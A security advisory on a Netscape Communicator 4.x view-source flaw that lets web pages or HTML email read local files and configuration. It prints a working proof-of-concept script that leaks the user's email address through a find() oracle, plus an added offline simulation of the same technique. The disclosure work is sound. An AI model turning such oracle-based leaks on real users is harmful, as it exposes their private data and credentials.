There is a security vulnerability in Netscape Communicator 4.6 Win95 and 4.07 Linux (and probably all 4.x versions) in the way it handles "view-source:wysiwyg://1/javascript:" URLs. A remote web page or HTML e-mail can use it to read local files and Netscape configuration data belonging to the user.
Credit:
This vulnerability was found by Georgi Guninski
The security problem arises when Communicator parses a "view-source:wysiwyg://1/javascript:" URL. The JavaScript embedded in such a URL runs inside a "view-source" window, and its security context is elevated to that of view-source, so the script can read data that an ordinary web page is not allowed to reach.
The second part of the problem is that other documents can be included into that window via ILAYER SRC="view-source:wysiwyg://1/...", and their contents can then be read with find(): the script appends one candidate character to a known prefix and asks find() whether the resulting string occurs in the page, recovering the text one character at a time.
This vulnerability allows an attacker to do the following:
* Browse local directories
* Read the user's cache
* Read parsed HTML files
* Read Netscape's configuration ("about:config") including user's email address, mail servers and the mail password.
This vulnerability may be exploited using HTML based email messages.
An easy workaround would be to disable JavaScript.
A demonstration page is available at: http://www.nat.bg/~joro/viewsource.html
The source code for this demonstration follows:
<HTML>
<BODY>
This demonstration tries to find your email address, it may take some time.
<BR><BR>
<A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>
<HR>
<!-- The script below builds a view-source:wysiwyg://1/javascript: URL whose
     payload (1) sets a page title and includes about:config through an ILAYER,
     (2) after a 3 second delay uses find() as a yes/no oracle to recover the
     value of mail.identity.useremail one character at a time, stopping at the
     first space, and (3) alerts the result. Assigning the URL to location runs
     the payload with view-source privileges. -->
<SCRIPT>
s="view-source:wysiwyg://1/javascript:s='<TITLE>tttt</TITLE>vvvv>>"
+"<ILAYER SRC=\"view-source:wysiwyg://1/about:config\"></ILAYER>"
+" <SCRIPT>blur();msg1=\"Your email is: \"; mend=\"general.\"+\"title_tips\";mag=\"mail.identity.useremail\"+\" = \";sp=\" \";res=mag;charstoread=50;"
+"setTimeout(\" "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
+" find(mend);"
+" for(c=1;c<256;c++) {"
+" t=res + String.fromCharCode(c);"
+" if (find(t,true,true)) {"
+" res=t;"
+" if (c==32) i=charstoread+1"
+" } "
+" }"
+"}"
+"res=res.substring(mag.length);"
+"alert(msg1 + res);"
+" ;\",3000);</"+"SCRIPT>'";
//a=window.open(s);
location=s;
</SCRIPT>
</BODY>
</HTML>
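The demonstration depends on find() behaving as a boolean oracle: it never returns the text of the included document, only whether a given string occurs in it. The following is an added example, not Guninski's code and not part of the original advisory, that runs the same character-by-character extraction offline against a constructed stand-in for the about:config text. The preference names and values in SAMPLE_CONFIG_TEXT, the helper names makeFindOracle, leakAfterPrefix and leakPreference, and the simulated find() (a plain substring test in place of Netscape 4's window.find) are all assumptions made for the example.

```javascript
// Added example: the find()-oracle extraction technique of the demo, run offline.
//
// Constructed stand-in for what Netscape rendered for about:config. The
// preference names and values are assumed sample data, not real user data.
const SAMPLE_CONFIG_TEXT = [
  "general.title_tips = true",
  "mail.identity.useremail = joro@nat.bg",
  "network.hosts.pop_server = pop.example.net",
  "mail.remember_password = true",
].join("\n");

// Boolean oracle standing in for Netscape 4's window.find(text, caseSensitive, backward):
// the caller learns only whether `text` occurs somewhere in the document.
// `find.calls` counts queries so the cost of the leak can be measured.
function makeFindOracle(documentText) {
  const find = function (text) {
    find.calls += 1;
    return documentText.indexOf(text) !== -1;
  };
  find.calls = 0;
  return find;
}

// Recover the value that follows `prefix` using only yes/no answers from `find`.
// Each round extends the known string by one character: every byte value 1..255
// is tried as the next character and the oracle confirms the right one. The
// loop ends when `delimiter` is reached, when nothing follows, or after maxChars.
function leakAfterPrefix(find, prefix, maxChars, delimiter) {
  let known = prefix;
  for (let i = 0; i < maxChars; i++) {
    let next = null;
    for (let c = 1; c < 256; c++) {
      const candidate = known + String.fromCharCode(c);
      if (find(candidate)) {
        next = candidate;
        break;
      }
    }
    if (next === null) break;            // the document ends right after `known`
    known = next;
    if (known.endsWith(delimiter)) {      // end of this preference's value
      known = known.slice(0, -delimiter.length);
      break;
    }
  }
  return known.substring(prefix.length);
}

// Leak one "name = value" preference and report how many oracle queries it took.
function leakPreference(documentText, prefName) {
  const find = makeFindOracle(documentText);
  const value = leakAfterPrefix(find, prefName + " = ", 50, "\n");
  return { value: value, queries: find.calls };
}

const leaked = leakPreference(SAMPLE_CONFIG_TEXT, "mail.identity.useremail");
console.log("leaked '" + leaked.value + "' with " + leaked.queries + " find() queries");
```

The original demo stops at the first space (c==32) and scans all 255 candidates per position; this version stops at a newline and breaks on the first hit, so a value costs roughly the sum of its character codes in queries, which is why the demo page warns that it "may take some time". Passing " " as the delimiter reproduces the demo's stopping rule.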